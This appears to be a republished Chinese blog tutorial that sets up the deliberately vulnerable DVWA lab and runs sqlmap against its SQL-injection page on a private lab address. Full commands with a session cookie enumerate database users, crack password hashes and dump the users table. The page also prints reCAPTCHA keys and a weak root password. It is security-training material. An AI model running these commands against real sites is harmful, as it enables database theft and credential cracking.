DVWA+SQLmap+Mysql注入实战

本文涉及的产品
RDS MySQL DuckDB 分析主实例,集群系列 4核8GB
RDS MySQL DuckDB 分析主实例,基础系列 4核8GB
RDS AI 助手,专业版
简介:

一、部署渗透测试演练系统DVWA


1. 下载DVWA软件包

    官方下载地址:http://www.dvwa.co.uk/,当前最新版本为:DVWA-1.9

    wget https://codeload.github.com/ethicalhack3r/DVWA/zip/master


2. 部署linux环境

    yum install -y httpd mysql mysql-server php php-mysql php-gd


3. 开启httpd和mysqld服务

    service httpd start

    service mysqld start


4. 测试htttp对php的解析,浏览器访问http://ip/test.php正常

    vim /var/www/html/test.php

    写入:

   <?php

     phpinfo();

   ?>


5. 修改mysql的密码

     mysqladmin -uroot password "123456"


6. 将DVWA-1.9.zip解压至/var/www/html,并修改属主为apache

     unzip DVWA-1.9.zip -d /var/www/html

    chown -R apache:apache /var/www/html/DVWA-1.9


7. 修改DVWA配置文件数据库密码为123456

    vim /var/www/html/DVWA-1.9/config/config.inc.php

    修改密码:

    $_DVWA[ 'db_password' ] = '123456';

 wKiom1ir7Zqx50rWAAAP-62Y_pI155.png


8. 进入DVWA的web安装界面,http://ip/DVWA-1.9/setup.php,发现报错    

 wKioL1ir7XqzRVPOAACIFpWTX4A702.png


   解决方法:

   1)编辑php的配置文件 vim /etc/php.ini

        allow_url_include = On

 wKioL1ir7b-w2fnpAAAN5J3Xzs8076.png


   2)编辑DVWA配置文件 vim /var/www/html/DVWA-1.9/config/config.inc.php

        找到创建公钥和私钥的链接:https://www.google.com/recaptcha/admin/create申请后填写在配置文件中:

       公钥:6LcY-BUUAAAAAGJ5Q0Y5zPEccMG5vCeHI1Lnwqyb

                  私钥:6LcY-BUUAAAAAPvvHmppQRscfHuV0QPPuM5-Px3k

 wKiom1ir7eKBimnKAAAbMpRMHrA320.png


wKiom1ir7g6QSbuPAACTPfN-Vpc641.png

wKioL1ir7imwM_wfAAAjjIuOh70351.png

    


9. 重启http,使修改的配置文件生效,刷新web界面,错误消除

    service httpd restart

 wKioL1ir7k2iQ69HAABWVJhzP2s567.png


10. 点击Create/Reset Database,自动跳转到登录界面,默认用户名/密码:admin/password

      至此,DVWA已部署完成

      wKiom1ir7mPx7mZKAADua26pFAg653.png



二、安装SQLmap漏洞查看工具

 

1. 官方下载:http://sqlmap.org/http://sqlmap.org/

     版本:sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz


2.  解压sqlmap,并执行

      说明:该工具是用python写的,需安装python,它不是编译型语言,而是执行性语言,直接运行

     wKioL1ir7pKy6QmJAAAJO0svK9E341.png


      命令 tar -zxvf  sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz

      命令 ./sqlmap.py

      wKiom1ir7rHicRpaAAApvyYH0lE089.png


3. 设置命令别名,修改vim /etc/profile,直接使用sqlmap命令

     命令 alias sqlmap='python /usr/local/src/sqlmapproject-sqlmap-7eab1bc/sqlmap.py'

     命令 source /etc/profile  

      wKiom1ir7sWD15LEAAAVcG8dWIw364.png



三、实战

        实战1:枚举登录MYSQL数据的用户名与密码

        实战2:枚举所有数据库

        实战3:枚举指定数据库的数据表

        实战4:获取指定数据库和表中所有列的信息

        实战5:枚举指定数据表中的所有用户名与密码


       环境准备:

       1)登录http://192.168.1.124/DVWA-1.9,将安全级别设置为最低;


       2)开启Firefox浏览器TamperData插件,等待获取cookies值;


       3)在【SQL Injection】项中,提交User ID为22(地址栏出现id=22,这就是MySQL的注入点)

             获得注入点:http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#


       4)TamperData弹窗获取cookies值:security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552


        

wKioL1ir7vqCmqKpAACBOlEPstQ897.png


wKiom1ir7xaQEBcYAABbjMUXB0w015.png



实战1:枚举登录MYSQL数据的用户名与密码

   sqlmap语法参数:

  • -u :指定目标URL,即注入点

  • --cookies:当前会话的cookies值

  • -b:获取数据库类型,检索数据库管理系统标识

  • --current-db:获取当前数据库

  • --current-user:获取当前登录数据库使用的用户


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' -b  --current-db  --current-user


说明:根据提示回复Y,继续


wKiom1ir73_DP8MFAABNbA9Svfw188.png


结果:得到当前数据库为dawa,使用的用户为root@localhost


wKioL1ir75iB4QDPAAA4GIZMCIU558.png



实战2:枚举所有数据库

   sqlmap语法参数:

  • --users:枚举数据库用户名

  • -password:枚举数据库用户的密码(hash)

   

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" --users --password

wKioL1ir79DQPsHIAAAdqeK4hsY147.png


说明:选择目录下字典文件,暴力破解


wKioL1ir79zz1rl9AAAboWh7XLg480.png


结果:数据库用户名为root,密码也有明文形式123456


wKiom1ir7-igiyGKAAAj8h9xVlw598.png



实战3:枚举数据库和指定数据库的数据表

   sqlmap语法参数:

  • --dbs:枚举当前数据库


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" --dbs


结果:mysql下所有的数据库

wKiom1ir8ALiZIK3AAAmjvflPbM786.png


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa --tables


结果:dvwa库中,所有的表

wKiom1ir8BXA7lIhAAAjvpwDeGY232.png


实战4:获取指定数据库和表中所有列的信息

   sqlmap语法参数:

  • -D:指定的数据库

  • -T:指定数据库中的数据表

  • --columns:获取列的信息


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa -T users --columns


结果:dvwa库,users表中所有字段信息

wKiom1ir8CeR8T6bAAA8TyLn2yA812.png



实战5:枚举指定数据表中的所有用户名与密码

   sqlmap语法参数:

  • -C:枚举数据表中的列

  • --dump:存储数据表项


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa -T users -C user,password --dump


结果:dvwa库,users表中user字段和password字段信息,最后表中信息转存文件中

wKioL1ir8ECQtb0YAABIarDX3dw296.png










本文转自 huangzp168 51CTO博客,原文链接:http://blog.51cto.com/huangzp/1899871,如需转载请自行联系原作者
相关实践学习
自建数据库迁移到云数据库
本场景将引导您将网站的自建数据库平滑迁移至云数据库RDS。通过使用RDS,您可以获得稳定、可靠和安全的企业级数据库服务,可以更加专注于发展核心业务,无需过多担心数据库的管理和维护。
MySQL数据库入门学习
本课程通过最流行的开源数据库MySQL带你了解数据库的世界。 &nbsp; 相关的阿里云产品:云数据库RDS MySQL 版 阿里云关系型数据库RDS(Relational Database Service)是一种稳定可靠、可弹性伸缩的在线数据库服务,提供容灾、备份、恢复、迁移等方面的全套解决方案,彻底解决数据库运维的烦恼。 了解产品详情:&nbsp;https://www.aliyun.com/product/rds/mysql&nbsp;
目录
相关文章
|
11月前
|
负载均衡 算法 关系型数据库
大数据大厂之MySQL数据库课程设计:揭秘MySQL集群架构负载均衡核心算法:从理论到Java代码实战,让你的数据库性能飙升!
本文聚焦 MySQL 集群架构中的负载均衡算法,阐述其重要性。详细介绍轮询、加权轮询、最少连接、加权最少连接、随机、源地址哈希等常用算法,分析各自优缺点及适用场景。并提供 Java 语言代码实现示例,助力直观理解。文章结构清晰,语言通俗易懂,对理解和应用负载均衡算法具有实用价值和参考价值。
大数据大厂之MySQL数据库课程设计:揭秘MySQL集群架构负载均衡核心算法:从理论到Java代码实战,让你的数据库性能飙升!
|
缓存 关系型数据库 MySQL
MySQL索引策略与查询性能调优实战
在实际应用中,需要根据具体的业务需求和查询模式,综合运用索引策略和查询性能调优方法,不断地测试和优化,以提高MySQL数据库的查询性能。
690 66
|
SQL 安全 关系型数据库
mysql注入-字符编码技巧
通过字符编码技巧,攻击者可以在SQL注入中绕过常见的输入验证机制,成功攻击数据库。因此,理解这些技巧及其可能的攻击路径,对防御SQL注入至关重要。开发者应采取多层次的安全措施,确保应用程序在不同字符集和编码环境下都能有效防御注入攻击。通过强制使用统一编码、严格的输入验证、预编译语句以及多层次的编码检查,可以有效地提高系统的安全性,防止SQL注入攻击带来的风险。
430 72
|
前端开发 关系型数据库 MySQL
PHP与MySQL动态网站开发实战指南####
【10月更文挑战第21天】 本文将深入浅出地探讨如何使用PHP与MySQL构建一个动态网站,从环境搭建到项目部署,全程实战演示。无论你是编程新手还是希望巩固Web开发技能的老手,都能在这篇文章中找到实用的技巧和启发。我们将一起探索如何通过PHP处理用户请求,利用MySQL存储数据,并最终呈现动态内容给用户,打造属于自己的在线平台。 ####
686 0
|
SQL 存储 关系型数据库
MySQL秘籍之索引与查询优化实战指南
最左前缀原则。不冗余原则。最大选择性原则。所谓前缀索引,说白了就是对文本的前几个字符建立索引(具体是几个字符在建立索引时去指定),比如以产品名称的前 10 位来建索引,这样建立起来的索引更小,查询效率更快!
457 22
 MySQL秘籍之索引与查询优化实战指南
|
安全 关系型数据库 MySQL
PHP与MySQL动态网站开发实战指南####
——深入探索LAMP栈下的高效数据交互与处理技巧 ####
|
关系型数据库 MySQL PHP
PHP与MySQL动态网站开发实战指南####
深入探索PHP与MySQL的协同工作机制,本文旨在通过一系列实战案例,揭示构建高效、稳定且用户友好的动态网站的秘诀。从环境搭建到数据交互,再到最佳实践分享,本文为开发者提供了一条清晰的学习路径,助力其在LAMP(Linux, Apache, MySQL, PHP/Perl/Python)栈上实现技术飞跃。 ####
|
关系型数据库 MySQL PHP
PHP与MySQL动态网站开发实战指南####
本文深入探讨了PHP与MySQL在动态网站开发中的应用实践,通过具体案例解析如何高效结合这两大技术构建数据驱动的Web应用。文章将涵盖环境搭建、基础语法回顾、数据库设计与操作、用户注册与登录系统实现等关键步骤,旨在为开发者提供一个从零到一的项目实战路径,展示PHP与MySQL协同工作的强大能力。 ####
|
NoSQL 关系型数据库 MySQL
MySQL与Redis协同作战:优化百万数据查询的实战经验
【10月更文挑战第13天】 在处理大规模数据集时,传统的关系型数据库如MySQL可能会遇到性能瓶颈。为了提升数据处理的效率,我们可以结合使用MySQL和Redis,利用两者的优势来优化数据查询。本文将分享一次实战经验,探讨如何通过MySQL与Redis的协同工作来优化百万级数据统计。
750 5
|
监控 关系型数据库 MySQL
数据库优化:MySQL索引策略与查询性能调优实战
【10月更文挑战第27天】本文深入探讨了MySQL的索引策略和查询性能调优技巧。通过介绍B-Tree索引、哈希索引和全文索引等不同类型,以及如何创建和维护索引,结合实战案例分析查询执行计划,帮助读者掌握提升查询性能的方法。定期优化索引和调整查询语句是提高数据库性能的关键。
1236 1

热门文章

最新文章

推荐镜像

更多